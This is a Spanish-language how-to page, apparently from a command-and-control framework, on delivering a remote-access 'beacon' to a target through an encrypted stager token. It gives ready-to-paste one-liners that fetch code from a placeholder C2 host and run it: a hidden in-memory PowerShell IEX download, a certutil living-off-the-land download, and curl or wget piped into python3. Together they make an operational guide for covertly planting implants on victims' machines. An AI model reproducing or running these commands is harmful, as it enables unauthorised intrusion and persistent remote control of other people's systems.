Entrega con Stager

Entrega con Stager

El stager te permite entregar un beacon mediante un solo one-liner sin copiar archivos manualmente. El payload está cifrado con AES-256-CBC y solo puede descifrarse con la clave embebida en el one-liner.

Paso 1 — Generar un beacon

Primero crea un beacon desde Generar Beacon. Descarga el archivo fuente .py, .ps1 o .jar.

Paso 2 — Crear un token stager

Ve a Stager en la barra lateral:

1. Pega el código fuente del beacon
2. Establece Máximo de usos (ej. 1 para uso único)
3. Establece un Tiempo de expiración
4. Haz clic en Crear

Se genera una URL de token junto con todos los one-liners de entrega.

Paso 3 — Entregar al objetivo

Elige el one-liner que se adapte a tu escenario:

Windows — PowerShell (en memoria):

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('https://tu-c2:8443/s/TOKEN?k=CLAVE')"

Windows — certutil (LOLBin):

certutil -urlcache -split -f https://tu-c2:8443/s/TOKEN?k=CLAVE %TEMP%\b.py && pythonw %TEMP%\b.py

Linux — curl:

curl -sk 'https://tu-c2:8443/s/TOKEN?k=CLAVE' | python3

Linux — wget:

wget -qO- 'https://tu-c2:8443/s/TOKEN?k=CLAVE' | python3

Todos los one-liners se muestran pre-rellenados en el panel — solo copia y pega.

Paso 4 — Revocar el token

Tras el uso, ve a Stager y haz clic en Revocar junto al token para invalidarlo inmediatamente.